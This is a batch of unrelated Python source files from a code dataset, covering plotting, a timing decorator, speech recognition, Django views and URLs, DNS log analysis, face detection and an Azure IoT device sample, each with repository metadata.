np.array(figdir[metric][knob][app]['y'])\n\n app = app.split('/')[0]\n indices = [i[0]\n for i in sorted(enumerate(x), key=lambda a:a[1])]\n x, y = x[indices], y[indices]\n # ax.set_title(app)\n ax = plt.subplot(gs[idx//cols, idx % cols])\n # if idx%cols == 0:\n # ax.set_ylabel(metric)\n # if idx//cols == rows-1:\n # ax.set_xlabel(knob)\n if len(y) == 0:\n print('Empty values for {}:{}:{}'.format(metric, knob, app))\n continue\n y = y / y[0]\n yavg_l.append((x, y))\n ax.plot(x, y, label=globyc['bench_shorts']\n [app], marker=locyc['marker'])\n ax.legend(**locyc['legend'])\n ax.yaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['y'], integer=True))\n ax.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['x'], integer=True))\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n plt.xticks(**locyc['ticks']['x'])\n plt.yticks(**locyc['ticks']['y'])\n # ax.ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n # ax2.yaxis.set_major_locator(matplotlib.ticker.LinearLocator(nticks))\n idx += 1\n # Plot the average\n x = set()\n for d in yavg_l:\n x |= set(d[0])\n x = list(x)\n y = np.zeros(len(x))\n ynum = np.zeros(len(x))\n for d in yavg_l:\n for i in range(len(d[0])):\n y[x.index(d[0][i])] += d[1][i]\n ynum[x.index(d[0][i])] += 1\n y /= ynum\n ax = plt.subplot(gs[idx//cols, idx % cols])\n ax.plot(x, y, label=globyc['bench_shorts']\n ['average'], marker=locyc['marker'])\n ax.legend(**locyc['legend'])\n ax.yaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['y'], integer=True))\n ax.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['x'], integer=True))\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n plt.xticks(**locyc['ticks']['x'])\n plt.yticks(**locyc['ticks']['y'])\n # end plot the average\n\n plt.tight_layout()\n plt.subplots_adjust(wspace=0.3, hspace=0.15, top=0.95)\n save_and_crop(fig, outfile, dpi=600, bbox_inches='tight')\n if args.show:\n plt.show()\n plt.close()\n\n # plt.legend(loc='best', fancybox=True, fontsize='11')\n # plt.axvline(700.0, color='k', linestyle='--', linewidth=1.5)\n # plt.axvline(1350.0, color='k', linestyle='--', linewidth=1.5)\n # plt.annotate('Light\\nCombine\\nWorkload', xy=(\n # 200, 6.3), textcoords='data', size='16')\n # plt.annotate('Moderate\\nCombine\\nWorkload', xy=(\n # 800, 6.3), textcoords='data', size='16')\n # plt.annotate('Heavy\\nCombine\\nWorkload', xy=(\n # 1400, 8.2), textcoords='data', size='16')\n","sub_path":"util/job_launching/plotscripts/subplots_one_line_per_bench.py","file_name":"subplots_one_line_per_bench.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4549121","text":"import time\nfrom functools import wraps\ndef logtime(fun):\n \n @wraps(fun)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n result = fun(*args, **kwargs)\n total_time = time.time() - start_time\n with open('timelog.txt', 'a') as outfile:\n outfile.write(f'{time.time()} \\t {fun.__name__} \\t {total_time} \\n')\n return result\n\n return wrapper\n\n\n@logtime\ndef print_args(a1, a2):\n print(a1, a2)\n\n@logtime\ndef sum_args(a1, a2):\n return a1 + a2\n\n\nprint_args('x1', 'x2')\n\nsum_args(2, 3)\n\n\n","sub_path":"decorators_with_functools.py","file_name":"decorators_with_functools.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"220672679","text":"# -*- coding: utf-8 -*-\nimport copy\nimport logging\nimport os\nimport socket\nfrom threading import Thread\n\nimport speech_recognition as sr\nfrom yandex_speech import TTS\n\n\nclass Recognizer:\n\n def __init__(self, **kwargs):\n\n self.logger = kwargs.get('logger', logging.getLogger(__name__))\n\n if kwargs.get('list_mics'):\n print(''.join(['{} {}\\n'.format(i, name) for i, name in enumerate(sr.Microphone.list_microphone_names())]))\n\n exit(0)\n\n self.rec = sr.Recognizer()\n self.rec.phrase_threshold = 0.1\n\n self.mic = sr.Microphone(device_index=kwargs.get('device_index'),\n sample_rate=kwargs.get('sample_rate'),\n chunk_size=kwargs.get('chunk_size') or 1024)\n\n adjust_mic_device_index = kwargs.get('adjust_device_index')\n\n if adjust_mic_device_index:\n self.adjust_mic = sr.Microphone(device_index=adjust_mic_device_index,\n sample_rate=kwargs.get('sample_rate'),\n chunk_size=kwargs.get('chunk_size') or 1024)\n else:\n self.adjust_mic = self.mic\n\n self.rec.operation_timeout = kwargs.get('operation_timeout')\n\n self.listen_timeout = kwargs.get('listen_timeout')\n self.phrase_time_limit = kwargs.get('phrase_time_limit')\n\n self.error_limit = kwargs.get('error_limit')\n self.error_count = self.error_limit + 1\n\n def adjust_recognizer(self, source=None):\n\n self.logger.info('adjusting microphone...')\n\n if source:\n self.rec.adjust_for_ambient_noise(source)\n else:\n with self.adjust_mic as source:\n self.rec.adjust_for_ambient_noise(source)\n\n self.logger.info('adjusting microphone done: {}'\n .format(self.rec.energy_threshold))\n\n def listen(self):\n\n with self.mic as source:\n\n if self.adjust_mic != self.mic:\n Thread(target=self.adjust_recognizer).start()\n\n else:\n if self.error_limit and self.error_count > self.error_limit:\n self.adjust_recognizer(source)\n self.error_count = 0\n\n try:\n self.logger.info('listening...')\n\n return self.rec.listen(source=source,\n timeout=self.listen_timeout,\n phrase_time_limit=self.phrase_time_limit)\n except sr.WaitTimeoutError:\n\n self.error_count += 1\n self.logger.warning('waiting timeout ({} sec) expired'.format(self.listen_timeout))\n\n def recognize(self, audio_data, language):\n\n self.logger.info('sending data for recognition...')\n\n try:\n return self.rec.recognize_google(audio_data=audio_data,\n language=language)\n\n except sr.UnknownValueError:\n\n self.logger.warning('recognition failed')\n self.error_count += 1\n\n except (sr.RequestError, socket.timeout) as e:\n\n self.logger.error('request error: {}'.format(e))\n\n\nclass Player:\n\n @staticmethod\n def play_file(filename):\n\n name, extention = os.path.splitext(filename)\n\n if extention == '.wav':\n Player.play_wav(filename)\n else:\n raise Exception('Unknown file format!')\n\n @staticmethod\n def play_wav(filename):\n chunk = 1024\n\n import wave\n wf = wave.open(filename, 'rb')\n\n import pyaudio\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n\n data = wf.readframes(chunk)\n\n while len(data) > 0:\n stream.write(data)\n data = wf.readframes(chunk)\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n\nclass YandexTTS:\n\n def __init__(self, **kwargs):\n\n self.logger = kwargs.get('logger', logging.getLogger(__name__))\n self.yandex_tts = TTS(speaker=kwargs.get('speaker', 'jane'),\n audio_format='wav',\n emotion=kwargs.get('emotion'),\n key=kwargs['key'])\n\n def save_to_file(self, text, filename):\n\n yandex_tts = copy.copy(self.yandex_tts)\n yandex_tts.generate(text)\n yandex_tts.save(filename)\n\n self.logger.info('saved speech to file {}'.format(filename))\n","sub_path":"nodes/speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"133340163","text":"from pathlib import Path\n\n\nhome = Path.home()\nassets: Path = Path(__file__).parent / 'assets'\n\nMAIN_MUSIC = assets / 'Sappheiros - Lights.mp3'\nDEFAULT_VOLUME = .25\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 1000\nSCREEN_TITLE = \"Fishy\"\nCHARACTER_SCALING = 1\nTILE_SCALING = 0.5\nCOIN_SCALING = 0.5\nPLAYER_MOVEMENT_SPEED = 5","sub_path":"final_project/fishy/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"426859412","text":"from textblob import TextBlob\nfrom vader_sentiment.vader_sentiment import SentimentIntensityAnalyzer\n\n\ndef get_sentiment(sentence):\n sentence = str(sentence)\n blob = TextBlob(sentence)\n return blob.sentiment\n\n\ndef get_sentiment_vader(sentence):\n if sentence is None or sentence == \"\":\n vs = {\"pos\": 0, \"neg\": 0, \"neu\": 0}\n else:\n analyzer = SentimentIntensityAnalyzer()\n vs = analyzer.polarity_scores(sentence)\n return vs","sub_path":"backend/text_functions.py","file_name":"text_functions.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"137671116","text":"EOL = \"\\n\"\n\nclass Scenario:\n\n def __init__ (self, nom_scenario, nom_simulateur, log_std, log_nam):\n\n #\n # Ouverture des differents fichiers\n #\n\n # Fichier TCL contenant le scenario\n self.fichier_scenario = open(nom_scenario, \"w\", encoding=\"utf8\")\n\n # Fichier log std\n self.fichier_log_std = open(log_std, \"w\", encoding=\"utf8\")\n\n # Fichier log nam\n self.fichier_log_nam = open(log_nam, \"w\", encoding=\"utf8\")\n\n\n # Le simulateur\n self.simulateur = nom_simulateur\n\n\n #\n # Initialisation du fichier TCL\n #\n self.fichier_scenario.write(\"set \" + self.simulateur + \" [new Simulator]\" + EOL);\n\n\n\n def finir (self):\n\n #\n # Fermeture des fichiers\n #\n\n # Scenario\n self.fichier_scenarion.close();\n\n # Log std\n self.fichier_log_std.close();\n\n # Log nam\n self.fichier_log_nam.close();\n","sub_path":"EvaluationDePerformances/TP/TP2/ScenarioBuilder.py","file_name":"ScenarioBuilder.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"602697633","text":"# from steam.models import Details, Images\n\n#\n# def getDetailsModelFromJson(details_json, appid):\n# details = details_json['details'][appid]\n# success = details['success']\n# if success:\n# data = details['data']\n# game_details = Details()\n#\n# game_details.game_type = data['type']\n# game_details.name = data['name']\n# game_details.required_age = data['required_age']\n# game_details.about_the_game = data['about_the_game']\n# game_details.short_description = data['short_description']\n# game_details.supported_languages = data['supported_languages']\n# game_details.developers = data['developers']\n# game_details.publishers = data['publishers']\n# game_details.platforms = data['platforms']\n# game_details.release_date = data['release_date']['date']\n# game_details.coming_soon = data['release_date']['coming_soon']\n#\n# images = Images(\n# data['header_image'],\n# data['screenshots'],\n# data['background']\n# )\n#\n# game_details.images = images\n#\n# return data\n# return None\n\n# Check if the app has details\ndef isValidDetails(details_json, appid):\n return details_json[appid]['success']\n\n# Scale data to the SteamSpy and SteamAPI are on one line\ndef get_scaled_data(values):\n total = sum(values.values())\n max_length = 108081\n fracs_labels = {}\n for k, v in values.items():\n frac = ((100 / total) * v) / 100\n fracs_labels[k] = frac * 100\n new_amount = int(max_length * frac)\n values[k] = new_amount\n\n return values, fracs_labels\n","sub_path":"steam/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"43194827","text":"\"\"\"\n\nCode Challenge\n Name: \n Regular Expression 2\n Filename: \n regex2.py\n Problem Statement:\n You are given N email addresses. \n Your task is to print a list containing only valid email addresses in alphabetical order.\n Valid email addresses must follow these rules:\n\n It must have the username@websitename.extension format type.\n The username can only contain letters, digits, dashes and underscores.\n The website name can only have letters and digits.\n The minimum length is 2 and maximum length of the extension is 4. \n Hint: \n Using Regular Expression \n Input:\n lara@hackerrank.com\n brian-23@hackerrank.com\n britts_54@hackerrank.com\n Output:\n ['brian-23@hackerrank.com', 'britts_54@hackerrank.com', 'lara@hackerrank.com']\n\n\"\"\"\nimport re\n\nfile = open(\"mail.txt\",\"r\")\n\nmails =re.compile(\"[a-z0-9-_]+@[a-z0-9]+.{2,4}\")\nlist1 =[]\n\nfor item in file:\n data = mails.findall(item)\n \n if data is None:\n continue\n else:\n list1.append(data[0])\nlist1.sort()\nprint(list1)\n\nfile.close()\n\n\n\n\n\n","sub_path":"day5/regex2.py","file_name":"regex2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"653481411","text":"import logging\nfrom inspect import getfullargspec\nfrom functools import wraps\n\nlogger = logging.getLogger(__name__)\n\n\ndef permit_superuser(user_field_name=\"user\"): #Decorator\n def decorator(func):\n argspec = getfullargspec(func)\n user_index = argspec.args.index(user_field_name) \n @wraps(func)\n def add_superuser_check(*args,**kwargs):\n try:\n user=args[user_index]\n except IndexError:\n user=kwargs[user]\n return user.is_superuser or func(*args, **kwargs) \n return add_superuser_check\n return decorator\n\n@permit_superuser()\ndef is_owner(user, batch):\n return user == batch.user","sub_path":"dear_petition/petition/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479764475","text":"#!/usr/bin/env python\n# vim: ts=2:sw=2:tw=80:nowrap\n# -*- coding: utf-8 -*-\n\"\"\"\nRemote device interface for the BeagleBone Black using AFRL firmware/hardware.\n\"\"\"\n\nimport sys\nfrom os.path import join as path_join, dirname, pardir\n\nimport Pyro4\n\nimport bbb\nfrom logging import debug\n\nfrom ......version import version as arbwave_version\nfrom .bbb_pyro import format_objectId\n\nBBB_VERSION = 'bbb-0.4.0'\n\n\n\nclass Device(object):\n \"\"\"\n The Logical Device for a single instance of the BeagleBone Black using AFRL\n firmware/hardware.\n \"\"\"\n\n def __init__(self, hostid, type):\n super(Device,self).__init__()\n self.hostid = hostid\n self.objectId = format_objectId(hostid, type)\n self._owner = None\n\n assert bbb.version.compatible(bbb.VERSION, BBB_VERSION), \\\n 'AFRL/BeagleBone Black version is incompatible'\n\n def __repr__(self):\n return self.objectId\n\n def assert_sw_fw_compatibility(self):\n try:\n assert self.sw_fw_compatible, \\\n 'AFRL/BeagleBone Black software and firmware are not compatible with ' \\\n 'each other'\n except:\n self.close()\n raise\n\n\n def __del__(self):\n self.close()\n\n @Pyro4.expose\n @property\n def owner(self):\n return self._owner\n\n @Pyro4.expose\n @owner.setter\n def owner(self, value):\n self._owner = value\n\n @Pyro4.expose\n def get_version(self):\n \"\"\"return the Arbwave version\"\"\"\n return arbwave_version()\n\n @Pyro4.expose\n def get_objectId(self):\n return self.objectId\n","sub_path":"python/arbwave/backend/drivers/bbb/device/controller/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154099562","text":"import sys\n\nimport cv2\nimport tensorflow as tf\nfrom img_utils.files import images_in_dir\n\nfrom fr.facenet.face import Detection\n\n\ndef main(data_dir, output_dir):\n with tf.Graph().as_default():\n detector = Detection()\n\n image_files = images_in_dir(data_dir)\n for im_f in image_files:\n image = cv2.imread(im_f)\n faces, landmarks = detector.find_faces(image)\n print('landmarks: type: {}'.format(type(landmarks)))\n print('landmarks:{}'.format(landmarks))\n for f in faces:\n x1, y1, x2, y2 = f.bounding_box\n cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 2)\n points = landmarks.flatten()\n length = int(len(points) / 2)\n for i in range(length):\n cv2.circle(image, (points[i], points[length + i]), 2, (0, 0, 255), 2)\n cv2.imshow(im_f, image)\n key = cv2.waitKey(0)\n if key == ord('q'):\n cv2.destroyAllWindows()\n elif key == 27:\n break\n\n\nif __name__ == '__main__':\n args = sys.argv\n if len(args) < 3:\n print('Usage: python test_alignment.py ${data_dir} ${output_dir}')\n exit(0)\n\n main(args[1], args[2])\n","sub_path":"test/test_mtcnn/test_alignment.py","file_name":"test_alignment.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495800482","text":"from . import views as posts_views\nfrom django.urls import path\nfrom django.contrib.auth.decorators import login_required\n\n\nurlpatterns = [\n\n path('', posts_views.index, name='homepage'),\n\n path('category/', posts_views.show_category, name='category'),\n path('category/new/', posts_views.CategoryCreateView.as_view(), name='category_create'),\n path('category//delete/', posts_views.CateDeleteView.as_view(), name='category_delete'),\n path('category//', posts_views.CateDetailView.as_view(), name='category_detail'),\n\n path('post//', posts_views.PostDetailView.as_view(), name='postdetail'),\n path('post/new/', posts_views.PostCreateView.as_view(), name='postcreate'),\n path('post//update/', posts_views.PostUpdateView.as_view(), name='postupdate'),\n path('post//delete/', posts_views.PostDeleteView.as_view(), name='postdelete'),\n path('mypost/', posts_views.userprofile, name='myposts'),\n\n path('protocols/TPM/', posts_views.protocols_TPM, name='protocols_TPM'),\n path('protocols/FRET/', posts_views.protocols_FRET, name='protocols_FRET'),\n path('protocols/CoSMoS/', posts_views.protocols_CoSMoS, name='protocols_CoSMoS'),\n path('protocols/OT/', posts_views.protocols_OT, name='protocols_OT'),\n\n path('JC/', posts_views.index_JC, name='JC'),\n path('JC/new/', login_required(posts_views.JCForm.as_view()), name='JCcreate'),\n path('JC//', posts_views.JCDetailView.as_view(), name='JCdetail'),\n path('JC//update/', posts_views.JCUpdateView.as_view(), name='JCupdate'),\n path('JC//delete/', posts_views.JCDeleteView.as_view(), name='JCdelete'),\n]","sub_path":"sample/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"398722598","text":"\"\"\"Sandbox util functions.\"\"\"\n\nimport datetime\nimport os\nimport random\n\n\ndef fix_shard_name(shard_name):\n \"\"\"Kubernetes doesn't allow '-' in the beginning or end of attributes.\n\n Instead, replace them with an x.\n\n Example: -80 becomes x80, 80- becomes 80x.\n\n Args:\n shard_name: string, A standard shard name (like -80).\n\n Returns:\n A fixed shard name suitable for kubernetes (string).\n \"\"\"\n if shard_name.startswith('-'):\n return 'x%s' % shard_name[1:]\n if shard_name.endswith('-'):\n return '%sx' % shard_name[:-1]\n return shard_name\n\n\ndef create_log_file(log_dir, filename):\n \"\"\"Create a log file.\n\n This function creates a timestamped log file, and updates a non-timestamped\n symlink in the log directory.\n\n Example: For a log called init.INFO, this function will create a log file\n called init.INFO.20170101-120000.100000 and update a symlink\n init.INFO to point to it.\n\n Args:\n log_dir: string, Base path for logs.\n filename: string, The base name of the log file.\n\n Returns:\n The opened file handle.\n \"\"\"\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%H%M%S.%f')\n symlink_name = os.path.join(log_dir, filename)\n timestamped_name = '%s.%s' % (symlink_name, timestamp)\n if os.path.islink(symlink_name):\n os.remove(symlink_name)\n os.symlink(timestamped_name, symlink_name)\n return open(timestamped_name, 'w')\n\n\ndef generate_random_name():\n with open('naming/adjectives.txt', 'r') as f:\n adjectives = [l.strip() for l in f if l.strip()]\n with open('naming/animals.txt', 'r') as f:\n animals = [l.strip() for l in f if l.strip()]\n return '%s%s' % (random.choice(adjectives), random.choice(animals))\n\n","sub_path":"test/cluster/sandbox/sandbox_utils.py","file_name":"sandbox_utils.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"467486863","text":"from django.urls import path, include\nfrom . import views\nfrom rest_framework import routers\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom django.views.decorators.csrf import csrf_exempt\n\nrouter = routers.DefaultRouter()\nrouter.register('donors', views.DonorView)\nrouter.register('users', views.UserView)\nrouter.register('recipients', views.RecipientView)\nrouter.register('stores', views.StoreView)\nrouter.register('purchases', views.PurchaseView)\n\nurlpatterns = [\n\tpath('login/donor/', views.DonorLogin.as_view()),\n path('login/recipient/', views.RecipientLogin.as_view()),\n path('reimburse/', views.Reimburse.as_view()),\n path('scan/', views.ScanPurchase.as_view()),\n path('new-purchase/', csrf_exempt(views.NewPurchase.as_view())),\n path('purchases/', views.GetPurchases.as_view()),\n path('profile/', views.Profile.as_view()),\n path('addcard/', views.AddCard.as_view())\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n\nurlpatterns.append(path('', include(router.urls)))\n","sub_path":"donor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"629300846","text":"# october 18th 2016\n# this script characterizes the \n# X years in the life of a \n# recursive DNS server\n# it only considers the query (not the answer)\nfrom __future__ import print_function\n\nimport time\nimport sys\nimport pandas\nimport os\nimport logging\nfrom Epoch_Stats import Epoch_Stats\n\ntry:\n import __builtin__\nexcept ImportError:\n # Python 3\n import builtins as __builtin__\n\n\ndef print(*args, **kwargs):\n \"\"\"My custom print() function.\"\"\"\n # Adding new arguments to the print function signature \n # is probably a bad idea.\n # Instead consider testing if custom argument keywords\n # are present in kwargs\n # __builtin__.print('My overridden print() function!')\n # return __builtin__.print(*args, **kwargs)\n return logging.debug(*args)\n\n\ndef init_program(folder, output_filename):\n # logging.debug('Opening folder: ' + folder)\n print('Opening folder: ' + folder)\n file_name = \"small.txt\"\n file = open(file_name)\n\n dic_epoch = {}\n dic_month = {'Ene':'01','Feb':'02','Mar':'03','Abr':'04','May':'05','Jun':'06',\n 'Jul':'07','Ago':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}\n for line in file:\n line = line.replace(line.split('-')[1], dic_month[line.split('-')[1]])\n # print(line)\n epoch = int(time.mktime(time.strptime(line.split('client')[0][:-5], '%d-%m-%Y %H:%M:%S'))) - time.timezone\n # print(epoch)\n if epoch not in dic_epoch:\n dic_epoch[epoch] = 1\n else:\n dic_epoch[epoch] += 1\n print(dic_epoch)\n\n x = Epoch_Stats(1)\n #x.to_minutes()\n\n # for file in os.listdir(folder):\n # \ti = 1\n # \tif file.endswith(\".log\"):\n # \t\tpass\n\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n sys.exit('Usage: %s folder output-file' % sys.argv[0])\n\n folder = str(sys.argv[1])\n output_filename = str(sys.argv[2])\n\n logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S', level=logging.DEBUG)\n init_program(folder, output_filename)\n","sub_path":"characteristics.py","file_name":"characteristics.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558428246","text":"# JOIN\nclass PyAlgorithmInterface():\n\n\talgOptions = {\n\t\t\"ColOrder\" : [],\n\t\t\"XML\" : \"\"\n\t\t}\n\n\t\t\n\tmetaData = {\n\t\t\"Name\" : \"Join\",\n\t\t\"Creator\" : \"Nathan Martindale\",\n\t\t\"Version\" : \"1.0.0\"\n\t\t}\n\n\tdef getMetaData(self):\n\t\treturn self.metaData\n\n\tdef getOptions(self):\n\t\treturn self.algOptions\n\n\tdef setOptions(self, options):\n\t\tself.algOptions = options\n\n\tdef generateRunnableCode(self):\n\t\tcode = \"\"\"\njoiner = JoinOperation.Joiner()\nOUT_DATA = joiner.join(IN_DATA, {VALUE})\n\t\t\"\"\"\n\t\treturn code.format(VALUE=self.algOptions[\"ColOrder\"])\n\n\tdef generateCodeLibraries(self):\n\t\tf = open(\"Join_class.py\")\n\t\tJoinOperationLibrary = f.read()\n\t\tlibraries = { \"JoinOperation\":JoinOperationLibrary };\n\t\treturn libraries\n","sub_path":"Algorithms/algorithm_correct/operation/Join/Join.py","file_name":"Join.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"608182451","text":"import numpy as np\r\nfrom scipy.sparse import csgraph\r\nfrom scipy.sparse import linalg as la\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\n\r\nclass SpectralClustering:\r\n\r\n\tdef __init__(self, graph, k):\r\n\t\tself.graph = graph\r\n\t\tself.k = k\r\n\t\tself.laplacian_matrix = np.zeros(shape=(graph.n, graph.n))\r\n\t\tself.eigenvalues_of_laplacian = np.array(np.zeros(shape=(k, 1)), dtype=int)\r\n\t\tself.eigenvectors_of_laplacian = np.array(np.zeros(shape=(graph.n, k)), dtype=int)\r\n\t\tself.k_first_indices = np.array(np.zeros(shape=(k, 1)), dtype=int)\r\n\t\tself.labels = np.array([])\r\n\r\n\t\t\r\n\tdef compute_laplacian(self):\r\n\t\tself.laplacian_matrix = csgraph.laplacian(self.graph.adjacency_matrix, normed=True)\r\n\t\t\r\n\t\t\r\n\tdef compute_eigenvectors_of_laplacian(self):\r\n\t\tself.eigenvalues_of_laplacian, self.eigenvectors_of_laplacian = la.eigsh(self.laplacian_matrix, k=self.k, sigma=0, which='LM')\r\n\t\tfor i in range(self.graph.n):\r\n\t\t\tself.eigenvectors_of_laplacian[i] = preprocessing.normalize([self.eigenvectors_of_laplacian[i]], norm='l2')\r\n\t\t\r\n\t\t\r\n\tdef compute_clustering(self):\r\n\t\tkmeans = KMeans(n_clusters=self.k).fit(self.eigenvectors_of_laplacian)\r\n\t\tself.labels = kmeans.labels_\r\n\t\treturn kmeans\r\n\t\t\r\n\t\r\n\tdef goodness_of_partition(self):\r\n\t\tcut_edges = 0\r\n\t\tcommunity_sizes = np.array(np.zeros(shape=(self.k, 1)), dtype=int)\r\n\t\tfor i in range(self.graph.n):\r\n\t\t\tli = self.labels[i]\r\n\t\t\tcommunity_sizes[li] += 1\r\n\t\t\tfor j in range(i, self.graph.n):\r\n\t\t\t\tif self.graph.adjacency_matrix.item(i, j) is 1 and li != self.labels.item(j):\r\n\t\t\t\t\tcut_edges += 1\r\n\t\treturn cut_edges, min(community_sizes), max(community_sizes)\r\n\t\r\n\t\t","sub_path":"src/spectral_clustering.py","file_name":"spectral_clustering.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634080138","text":"\"\"\" Various setups\n\"\"\"\nimport json\nimport logging\nfrom zope.component import queryUtility\nfrom eea.app.visualization.zopera import IPropertiesTool\nfrom eea.app.visualization.interfaces import IDavizSettings\nfrom scoreboard.visualization.config import EU, WHITELIST\nlogger = logging.getLogger('scoreboard.visualization')\n\ndef setupVarious(context):\n \"\"\" Custom setup \"\"\"\n\n if context.readDataFile('scoreboard.visualization.txt') is None:\n return\n\n ds = queryUtility(IDavizSettings)\n if not ds.disabled('daviz.properties', 'ScoreboardVisualization'):\n logger.info('Disabling Daviz Properties for ScoreboardVisualization')\n ds.settings.setdefault('forbidden.daviz.properties', [])\n ds.settings['forbidden.daviz.properties'].append(\n 'ScoreboardVisualization')\n\n ptool = queryUtility(IPropertiesTool)\n if not getattr(ptool, 'scoreboard_properties', None):\n ptool.manage_addPropertySheet(\n 'scoreboard_properties', 'Scoreboard Properties')\n\n stool = getattr(ptool, 'scoreboard_properties', None)\n eu = stool.getProperty('EU', None)\n if not eu:\n default = json.dumps(EU, indent=2)\n stool.manage_addProperty('EU', default, 'text')\n\n whitelist = stool.getProperty('WHITELIST', None)\n if not whitelist:\n default = json.dumps(WHITELIST, indent=2)\n stool.manage_addProperty('WHITELIST', default, 'text')\n","sub_path":"scoreboard/visualization/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271743941","text":"#input do usuario\n\"\"\"\nnome = input(\"Digite o seu nome: \")\nidade = int(input(f\"Qual a sua idade {nome}?\"))\n\nnascimento = 2021 - idade\n\nprint(f\"{nome} vc nasceu em {nascimento}\")\n\"\"\"\n###Calculadora###\nn1 = int(input(\"Digite um numero: \"))\nn2 = int(input(\"Digite outro numero: \"))\nres = n1 + n2\n\nprint(f\"O resultado e: {res}\")","sub_path":"005/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"96432980","text":"import math\r\nn = int(input())\r\nnum =math.factorial(n)\r\ncount = 0\r\n\r\nif n <5 :\r\n print(0)\r\nelse :\r\n while True :\r\n num //= 10\r\n count += 1\r\n \r\n if num%10 != 0 :\r\n print(count)\r\n break\r\n\r\n","sub_path":"Algorithm/python/b1676.py","file_name":"b1676.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"357485630","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport os\nimport time\nfrom azure.iot.hub.devicesdk import DeviceClient, Message\nfrom azure.iot.hub.devicesdk.auth.authentication_provider_factory import from_connection_string\nimport uuid\n\n# The connection string for a device should never be stored in code. For the sake of simplicity we're using an environment variable here.\nconn_str = os.getenv(\"IOTHUB_DEVICE_CONNECTION_STRING\")\n# The \"Authentication Provider\" is the object in charge of creating authentication \"tokens\" for the device client.\nauth_provider = from_connection_string(conn_str)\n# For now, the SDK only supports MQTT as a protocol. the client object is used to interact with your Azure IoT hub.\n# It needs an Authentication Provider to secure the communication with the hub, using either tokens or x509 certificates\ndevice_client = DeviceClient.from_authentication_provider(auth_provider, \"mqtt\")\n\n# Connect the client.\ndevice_client.connect()\n\n# send 5 messages with a 1 second pause between each message\nfor i in range(0, 5):\n print(\"sending message #\" + str(i))\n msg = Message(\"test wind speed \" + str(i))\n msg.message_id = uuid.uuid4()\n msg.correlation_id = \"correlation-1234\"\n 